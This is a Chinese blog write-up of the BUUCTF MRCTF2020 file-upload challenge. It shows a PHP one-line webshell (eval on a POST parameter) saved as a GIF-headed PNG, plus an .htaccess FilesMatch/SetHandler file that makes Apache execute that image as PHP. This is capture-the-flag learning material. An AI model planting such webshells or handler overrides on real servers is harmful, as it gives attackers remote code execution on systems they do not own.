本文主要是介绍BUUCTF之[MRCTF2020]你传你呢-------文件解析漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
BUUCTF之[MRCTF2020]你传你🐎呢
虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。
首先,启动挑战的项目
emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上传漏洞,结果没做出来。
不管怎么样,先上传一句话木马。并且将下面的内容保存成文件1.png
GIF89a?
<script language="php">eval($_POST['zyh']);</script>
然后该上传改文件,并且用BurpSuite来抓包
结果发现php php2 phtml 这些文件的后缀名都不能绕过检测。所以就直接上传1.png,抱着试试看的心态。
当我点击这个测试连接的时候,结果返回错误信息。。。。
挣扎了好一段时间后跑去看别人的WP才知道这题是一个文件上传里的文件解析漏洞。总结下来的经验就是更改Apache里的.htaccess的配置。可以将其它类型的文件转化为PHP的文件类型。
来源网站:https://www.cnblogs.com/adforce/archive/2012/11/23/2784664.html
.htaccess是什么
启用.htaccess,需要修改httpd.conf,启用AllowOverride,并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名,可以用AccessFileName指令来改变。例如,需要使用.config ,则可以在服务器配置文件中按以下方法配置:AccessFileName .config 。
笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。
那么现在开始写一个.htaccess文件,里面的内容为:
<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>
注意里面的1.png要和你刚才上传的文件名一模一样!
现在返回到刚才的挑战页面,上传这个配置文件
最后flag在根目录下的flag文件下
这篇关于BUUCTF之[MRCTF2020]你传你呢-------文件解析漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!